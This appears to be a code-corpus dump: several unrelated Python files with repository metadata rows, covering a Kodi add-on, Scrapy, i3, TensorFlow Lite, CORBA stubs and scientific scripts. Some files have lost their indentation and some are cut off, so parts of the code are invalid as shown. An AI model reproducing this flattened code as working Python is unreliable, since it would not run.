def getAllParameter(self):
return self.__aParams
def getValue(self, sParamName):
if self.exist(sParamName):
sParamValue = self.__aParams[sParamName]
if not sParamValue.startswith('http'):
return urllib.unquote_plus(sParamValue)
else:
return urllib.unquote(sParamValue)
return False
def exist(self, sParamName):
if sParamName in self.__aParams:
return sParamName
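# Hypothetical caller, mirroring how Kodi fills sys.argv for a plugin:
# [base_url, handle, query_string]; the parameter names are assumptions.
if __name__ == '__main__':
    sys.argv = ['plugin://plugin.video.vstream/', '1',
                '?siteUrl=http%3A%2F%2Fexample.com&sMovieTitle=Demo']
    oInputParameterHandler = cInputParameterHandler()
    if oInputParameterHandler.exist('siteUrl'):
        print oInputParameterHandler.getValue('siteUrl')  # http://example.com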
| 28.142857 | 82 | 0.585025 |
9e4cb502eb0f0c55605aabaec7e1aff4dd5388a2 | 1,156 | py | Python | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import os
import urllib
import xml.dom.minidom as minidom
class xmlPipeline(object):
def __init__(self):
self.fout_xml = file('../purdue_research.xml', 'w')
self.doc = minidom.Document()
self.institution = self.doc.createElement("institution")
self.doc.appendChild(self.institution)
self.cnt = 0
def process_item(self, item, spider):
research = self.doc.createElement("research")
self.institution.appendChild(research)
groupname = self.doc.createElement("groupname")
groupname.appendChild(self.doc.createTextNode(item['groupname'].encode('utf-8')))
research.appendChild(groupname)
for profname in item['proflist']:
namenode = self.doc.createElement("professorname")
namenode.appendChild(self.doc.createTextNode(profname.encode('utf-8')))
research.appendChild(namenode)
self.cnt += 1
def close_spider(self, spider):
print self.cnt
self.doc.writexml(self.fout_xml, "\t", "\t", "\n", encoding="utf-8")
        self.fout_xml.close()
 | 33.028571 | 83 | 0.737024 |
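# As the header comment of the pipeline above says, it has to be registered in
# the Scrapy project's settings.py; a hypothetical entry (the module path is
# inferred from the file location and is an assumption):
#
#   ITEM_PIPELINES = {
#       'research.pipelines.xmlPipeline': 300,
#   }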
6fe39d4b0fbec68902a2630accbc196b86b0b924 | 399 | py | Python | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | '''
Helps generate the histogram for the Descriptive Stats quiz
'''
import csv
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import json
import numpy as np
ages = pd.read_csv('../../Datasets/congress-ages.csv')
#_data = ages.filter(like="113", axis=0)
_data = ages
#violin = sns.violinplot(data=ages, bw=0.3, x="age")
hist = sns.histplot(data=_data, bins=30, kde=False, x="age")
plt.show()
 | 23.470588 | 60 | 0.709273 |
db3d3d983f69dd07ff735b79db5e64251581264b | 244 | py | Python | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | from mayan.apps.dependencies.classes import PythonDependency
PythonDependency(
module=__name__, name='extract-msg', version_string='==0.23.3'
)
PythonDependency(
module=__name__, name='pycryptodome', version_string='==3.9.7'
)
| 27.111111 | 67 | 0.733607 |
054daee6481be69a3353899ef89b19429910e397 | 1,816 | py | Python | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import i3ipc
import sys
import Xlib.display
from ewmh import EWMH
import autotag
windowLikeContainerLayouts = ["tabbed", "stacked"]
def selectContainerForSwap(c):
return c.layout in windowLikeContainerLayouts or not c.nodes
def selectContainerForFocus(c):
return not c.nodes
# Checks if a window is visible via ewmh properties
def isVisible(w, ewmh, dpy):
win = dpy.create_resource_object("window", w.window)
return "_NET_WM_STATE_HIDDEN" not in ewmh.getWmState(win, str=True)
def traverseTree(container, select):
if select(container):
yield container
else:
for n in container.nodes:
yield from traverseTree(n, select)
if len(sys.argv) > 1 and sys.argv[1] == "-f":
action = "focus"
selectFunction = selectContainerForFocus
ewmh = EWMH()
dpy = Xlib.display.Display()
else:
action = "swap"
selectFunction = selectContainerForSwap
ewmh = None
dpy = None
i3 = i3ipc.Connection()
focusedContainer = i3.get_tree().find_focused()
c = focusedContainer
while c and c.type == "con":
c = c.parent
if c and c.type == "con" and c.layout in windowLikeContainerLayouts:
focusedContainer = c
if focusedContainer:
wsTree = focusedContainer.workspace()
biggestContainer = None
biggestSize = 0
for c in traverseTree(wsTree, selectFunction):
totalSize = c.rect.width * c.rect.height
if totalSize > biggestSize:
if action == "focus" and not isVisible(c, ewmh, dpy):
continue
biggestContainer = c
biggestSize = totalSize
if action == "swap":
focusedContainer.command("swap container with con_id %s" % biggestContainer.id)
autotag.tagTree(i3, None)
else:
biggestContainer.command("focus")
| 27.515152 | 87 | 0.675661 |
dc79897fe7e59ce9d9514480e4851115034db565 | 1,581 | py | Python | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 4 | 2019-03-28T09:58:34.000Z | 2020-04-29T15:08:44.000Z | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 452 | 2019-02-05T10:10:43.000Z | 2022-03-31T08:27:38.000Z | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 20 | 2019-02-01T09:04:48.000Z | 2021-12-23T09:23:07.000Z | # -*- coding: utf-8 -*-
from tests.renderer import DummyRenderInfo
from pyramid_oereb.lib.renderer.extract.xml_ import Renderer
from tests.renderer.xml import xml_templates
from pyramid_oereb.lib.records.view_service import ViewServiceRecord
template = xml_templates().get_template('view_service.xml')
def test_empty():
map = ViewServiceRecord(
reference_wms=dict(),
layer_index=0,
layer_opacity=1.0
)
content = template.render(**{
'map': map
}).decode('utf-8').split('\n')
assert content[0] == '' # empty filler line
assert content[1] == '<data:layerIndex>0</data:layerIndex>'
assert content[2] == '<data:layerOpacity>1.0</data:layerOpacity>'
assert content[3] == '' # empty filler line
assert len(content) == 4
def test_reference_wms():
renderer = Renderer(DummyRenderInfo())
renderer._language = 'de'
map = ViewServiceRecord(
reference_wms={'de': 'http://example.com?SERVICE=WMS&REQUEST=GetMap&FORMAT=image/png&SRS=epsg:2056'},
layer_index=0,
layer_opacity=1.0
)
content = template.render(**{
'map': map,
'multilingual': renderer.get_multilingual_text
}).decode('utf-8').split('\n')
assert content[5].strip() == """
<data:Language>de</data:Language>
""".replace(" ", "").replace('\n', '')
assert content[6].strip() == """
<data:Text>
http://example.com?SERVICE=WMS&REQUEST=GetMap&FORMAT=image/png&SRS=epsg:2056
</data:Text>
""".replace(" ", "").replace('\n', '')
assert len(content) == 13
| 32.265306 | 109 | 0.641366 |
d8c9744b3c8a9e7789bffcb7e96395331c5bc073 | 3,669 | py | Python | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 10 | 2020-02-19T09:16:54.000Z | 2022-02-04T16:19:33.000Z | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 47 | 2020-03-11T16:26:51.000Z | 2022-02-04T15:29:40.000Z | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 5 | 2020-03-12T21:33:22.000Z | 2020-12-21T14:43:04.000Z | #!/usr/bin/env python3
import logging
import os
import shutil
log = logging.getLogger(os.path.basename(__file__))
def module_template(module_qualname: str):
module_name = module_qualname.split(".")[-1]
title = module_name.replace("_", r"\_")
template = f"""{title}
{"="*len(title)}
.. automodule:: {module_qualname}
:members:
:undoc-members:
"""
return template
def package_template(package_qualname: str):
package_name = package_qualname.split(".")[-1]
title = package_name.replace("_", r"\_")
template = f"""{title}
{"="*len(title)}
.. automodule:: {package_qualname}
:members:
:undoc-members:
.. toctree::
:glob:
{package_name}/*
"""
return template
def index_template(package_name):
title = "Modules"
template = \
f"""{title}
{"="*len(title)}
.. automodule:: {package_name}
:members:
:undoc-members:
.. toctree::
:glob:
*
"""
return template
def write_to_file(content: str, path: str):
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "w") as f:
f.write(content)
os.chmod(path, 0o666)
def make_rst(src_root=os.path.join("src", "sensai"), rst_root=os.path.join("docs", "sensai"), clean=False, overwrite=False):
"""
Creates/updates documentation in form of rst files for modules and packages.
Does not delete any existing rst files. Thus, rst files for packages or modules that have been removed or renamed
should be deleted by hand.
    This method should be executed from the project's top-level directory.
    :param src_root: path to library base directory, typically "src/<library_name>"
    :param rst_root: target directory into which the generated .rst files are written
:param clean: whether to completely clean the target directory beforehand, removing any existing .rst files
:param overwrite: whether to overwrite existing rst files. This should be used with caution as it will delete
all manual changes to documentation files
:return:
"""
rst_root = os.path.abspath(rst_root)
if clean and os.path.isdir(rst_root):
shutil.rmtree(rst_root)
base_package_name = os.path.basename(src_root)
    write_to_file(index_template(base_package_name), os.path.join(rst_root, "index.rst"))
for root, dirnames, filenames in os.walk(src_root):
if os.path.basename(root).startswith("_"):
continue
base_package_relpath = os.path.relpath(root, start=src_root)
base_package_qualname = os.path.relpath(root, start=os.path.dirname(src_root)).replace(os.path.sep, ".")
for dirname in dirnames:
if not dirname.startswith("_"):
package_qualname = f"{base_package_qualname}.{dirname}"
package_rst_path = os.path.join(rst_root, base_package_relpath, f"{dirname}.rst")
log.info(f"Writing package documentation to {package_rst_path}")
write_to_file(package_template(package_qualname), package_rst_path)
for filename in filenames:
base_name, ext = os.path.splitext(filename)
if ext == ".py" and not filename.startswith("_"):
module_qualname = f"{base_package_qualname}.{filename[:-3]}"
module_rst_path = os.path.join(rst_root, base_package_relpath, f"{base_name}.rst")
if os.path.exists(module_rst_path) and not overwrite:
log.debug(f"{module_rst_path} already exists, skipping it")
log.info(f"Writing module documentation to {module_rst_path}")
write_to_file(module_template(module_qualname), module_rst_path)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
make_rst(clean=True)
| 31.09322 | 124 | 0.668029 |
236de7cb89ad8d1b32da5d0908e51ba769813654 | 2,330 | py | Python | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 36 | 2022-02-02T00:26:38.000Z | 2022-03-13T06:20:47.000Z | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 9 | 2022-02-02T01:41:33.000Z | 2022-03-09T17:06:14.000Z | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 3 | 2022-02-03T12:41:46.000Z | 2022-03-13T06:21:01.000Z | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# SUNDIALS Copyright Start
# Copyright (c) 2002-2022, Lawrence Livermore National Security
# and Southern Methodist University.
# All rights reserved.
#
# See the top-level LICENSE and NOTICE files for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# SUNDIALS Copyright End
# -----------------------------------------------------------------------------
# imports
import glob
import sys
import pylab as plt
import pandas as pd
import numpy as np
# load mesh data file
mesh = np.loadtxt('mesh.txt', dtype=np.double)
# X,Y,Z = np.meshgrid(mesh[0,:], mesh[1,:], mesh[2,:])
# calculate h
hx = mesh[0,1] - mesh[0,0]
hy = mesh[1,1] - mesh[1,0]
hz = mesh[2,1] - mesh[2,0]
nx = len(mesh[0,:])
ny = len(mesh[1,:])
nz = len(mesh[2,:])
print("nx, ny, nz = %d, %d, %d" % (nx, ny, nz))
print("hx, hy, hz = %g, %g, %g" % (hx, hy, hz))
# load output time file
times = np.loadtxt('t.000000.txt', dtype=np.double)
# load solution data files
ufiles = glob.glob('u.' + ('[0-9]'*6) + '.txt'); ufiles.sort()
vfiles = glob.glob('v.' + ('[0-9]'*6) + '.txt'); vfiles.sort()
wfiles = glob.glob('w.' + ('[0-9]'*6) + '.txt'); wfiles.sort()
udata = []
vdata = []
wdata = []
sys.stdout.write("reading 1/%d...\r" % len(ufiles))
sys.stdout.flush()
for idx in range(0,len(ufiles)):
sys.stdout.write("reading %d/%d...\r" % (idx+1,len(ufiles)))
sys.stdout.flush()
udata.append(pd.read_csv(ufiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
vdata.append(pd.read_csv(vfiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
wdata.append(pd.read_csv(wfiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
sys.stdout.write("\n")
sys.stdout.flush()
print("stacking...")
udata = pd.concat(udata, axis=1).to_numpy()
vdata = pd.concat(vdata, axis=1).to_numpy()
wdata = pd.concat(wdata, axis=1).to_numpy()
# reshape data into time,x,y,z arrays
print("reshaping...")
nt = len(times)
udata = np.reshape(udata, (nt, nx, ny, nz))
vdata = np.reshape(vdata, (nt, nx, ny, nz))
wdata = np.reshape(wdata, (nt, nx, ny, nz))
# save data to a compressed npz archive
print("saving...")
np.savez_compressed('output-with-h-%.2e.npz' % hx, t=times, u=udata, v=vdata, w=wdata, mesh=mesh)
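# Hypothetical round-trip check: reload the compressed archive written above
# and confirm the (nt, nx, ny, nz) layout.
data = np.load('output-with-h-%.2e.npz' % hx)
assert data['u'].shape == (nt, nx, ny, nz)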
| 31.486486 | 110 | 0.608155 |
e50352c796c7853a28d91f263b65b7be066ab17a | 4,909 | py | Python | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | 1 | 2021-04-16T11:55:41.000Z | 2021-04-16T11:55:41.000Z | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | null | null | null | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ObjectDetector class."""
import tensorflow as tf
from tensorflow_examples.lite.model_maker.core import compat
from tensorflow_examples.lite.model_maker.core.task import custom_model
from tensorflow_examples.lite.model_maker.core.task import model_spec as ms
def create(train_data,
model_spec,
validation_data=None,
epochs=None,
batch_size=None,
do_train=True):
"""Loads data and train the model for test classification.
Args:
train_data: Training data.
model_spec: Specification for the model.
validation_data: Validation data. If None, skips validation process.
epochs: Number of epochs for training.
batch_size: Batch size for training.
do_train: Whether to run training.
Returns:
    ObjectDetector
"""
model_spec = ms.get(model_spec)
if compat.get_tf_behavior() not in model_spec.compat_tf_versions:
raise ValueError('Incompatible versions. Expect {}, but got {}.'.format(
model_spec.compat_tf_versions, compat.get_tf_behavior()))
object_detector = ObjectDetector(model_spec, train_data.label_map)
if do_train:
tf.compat.v1.logging.info('Retraining the models...')
object_detector.train(train_data, validation_data, epochs, batch_size)
else:
object_detector.create_model()
return object_detector
class ObjectDetector(custom_model.CustomModel):
"""ObjectDetector class for inference and exporting to tflite."""
def __init__(self, model_spec, label_map):
super().__init__(model_spec, shuffle=None)
if model_spec.config.label_map and model_spec.config.label_map != label_map:
tf.compat.v1.logging.warn(
'Label map is not the same as the previous label_map in model_spec.')
model_spec.config.label_map = label_map
model_spec.config.num_classes = len(label_map)
def create_model(self):
self.model = self.model_spec.create_model()
return self.model
def _get_dataset_and_steps(self, data, batch_size, is_training):
"""Gets dataset, steps and annotations json file."""
if not data:
return None, 0, None
# TODO(b/171449557): Put this into DataLoader.
dataset = data.gen_dataset(
self.model_spec, batch_size, is_training=is_training)
steps = len(data) // batch_size
return dataset, steps, data.annotations_json_file
def train(self,
train_data,
validation_data=None,
epochs=None,
batch_size=None):
"""Feeds the training data for training."""
batch_size = batch_size if batch_size else self.model_spec.batch_size
# TODO(b/171449557): Upstream this to the parent class.
if len(train_data) < batch_size:
raise ValueError('The size of the train_data (%d) couldn\'t be smaller '
'than batch_size (%d). To solve this problem, set '
'the batch_size smaller or increase the size of the '
'train_data.' % (len(train_data), batch_size))
with self.model_spec.ds_strategy.scope():
self.create_model()
train_ds, steps_per_epoch, _ = self._get_dataset_and_steps(
train_data, batch_size, is_training=True)
validation_ds, validation_steps, val_json_file = self._get_dataset_and_steps(
validation_data, batch_size, is_training=False)
return self.model_spec.train(self.model, train_ds, steps_per_epoch,
validation_ds, validation_steps, epochs,
batch_size, val_json_file)
def evaluate(self, data, batch_size=None):
"""Evaluates the model."""
batch_size = batch_size if batch_size else self.model_spec.batch_size
ds = data.gen_dataset(self.model_spec, batch_size, is_training=False)
steps = len(data) // batch_size
# TODO(b/171449557): Upstream this to the parent class.
if steps <= 0:
raise ValueError('The size of the validation_data (%d) couldn\'t be '
'smaller than batch_size (%d). To solve this problem, '
'set the batch_size smaller or increase the size of the '
'validation_data.' % (len(data), batch_size))
return self.model_spec.evaluate(self.model, ds, steps,
data.annotations_json_file)
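# Hypothetical end-to-end sketch of the API above; 'efficientdet_lite0' and the
# DataLoader variables are assumptions about the surrounding Model Maker setup.
#
#   detector = create(train_data,
#                     model_spec='efficientdet_lite0',
#                     validation_data=validation_data,
#                     epochs=50,
#                     batch_size=8)
#   metrics = detector.evaluate(validation_data)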
| 40.908333 | 83 | 0.692605 |
299ea394a3c738b3b6ac6015aaa85d2ddef4333a | 657 | py | Python | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | null | null | null | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | 13 | 2020-11-03T06:30:06.000Z | 2020-12-17T02:15:24.000Z | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: 6cf36da6705f
Revises: 6561c4454534
Create Date: 2020-11-15 02:32:23.520188
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6cf36da6705f'
down_revision = '6561c4454534'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('product', sa.Column('image_url', sa.Text(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('product', 'image_url')
# ### end Alembic commands ###
| 22.655172 | 78 | 0.692542 |
569b8a9d9bbbfa30e87de0f739cd6e961ef6eada | 7,461 | py | Python | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | 1 | 2020-10-28T16:57:36.000Z | 2020-10-28T16:57:36.000Z | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | null | null | null | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | null | null | null | """ Module: IDL:omg.org/CosEventComm:1.0
Automagically generated by:-
The ORB called Fnorb v1.1.Return.of.Fnorb
"""
_FNORB_ID = "IDL:omg.org/CosEventComm:1.0"
# Fnorb modules.
import Fnorb.orb.CORBA
import Fnorb.orb.TypeManager
import Fnorb.orb.Util
class Disconnected(Fnorb.orb.CORBA.UserException):
""" Exception: IDL:omg.org/CosEventComm/Disconnected:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/Disconnected:1.0"
def __init__(self):
""" Constructor. """
return
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/Disconnected:1.0", "00000000000000160000004C000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F446973636F6E6E65637465643A312E300000000000000D446973636F6E6E65637465640000000000000000", Disconnected)
class PushConsumer(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PushConsumer:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PushConsumer:1.0"
def push(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushConsumer/push:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("push", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def disconnect_push_consumer(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushConsumer/disconnect_push_consumer:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_push_consumer", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PushConsumer:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50757368436F6E73756D65723A312E300000000000000D50757368436F6E73756D657200", PushConsumer)
class PushSupplier(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PushSupplier:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PushSupplier:1.0"
def disconnect_push_supplier(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushSupplier/disconnect_push_supplier:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_push_supplier", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PushSupplier:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50757368537570706C6965723A312E300000000000000D50757368537570706C69657200", PushSupplier)
class PullSupplier(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PullSupplier:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PullSupplier:1.0"
def pull(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/pull:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("pull", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def try_pull(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/try_pull:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
outputs.append(Fnorb.orb.CORBA.TC_boolean)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("try_pull", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def disconnect_pull_supplier(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/disconnect_pull_supplier:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_pull_supplier", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PullSupplier:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50756C6C537570706C6965723A312E300000000000000D50756C6C537570706C69657200", PullSupplier)
class PullConsumer(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PullConsumer:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PullConsumer:1.0"
def disconnect_pull_consumer(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullConsumer/disconnect_pull_consumer:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_pull_consumer", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PullConsumer:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50756C6C436F6E73756D65723A312E300000000000000D50756C6C436F6E73756D657200", PullConsumer)
#############################################################################
| 35.36019 | 288 | 0.6794 |
aeddd9de0bce4bfb21cf4760ce647c40073eb284 | 2,983 | py | Python | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 267 | 2015-03-28T10:29:35.000Z | 2022-02-07T08:54:59.000Z | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 92 | 2015-07-17T11:01:37.000Z | 2021-08-05T10:29:19.000Z | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 64 | 2015-06-27T10:05:45.000Z | 2021-03-26T08:03:16.000Z | #! /usr/bin/env python
from __future__ import print_function
'''
Copyright 2015 Tim Nonner
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import copy
def sort_with_precs(scenario) :
"""
    returns the tasks of the given scenario topologically sorted according to
    the lax precedence constraints
"""
S = scenario
'''
# get direct children for topological sort
children = { T : set() for T in S.tasks() }
for P in S.precs_lax() :
children[P.left].add(P.right)
# extend children to other descendents
for T in S.tasks() :
task_stack = {T}
while task_stack :
T_ = task_stack.pop()
children[T] = children[T] | children[T_]
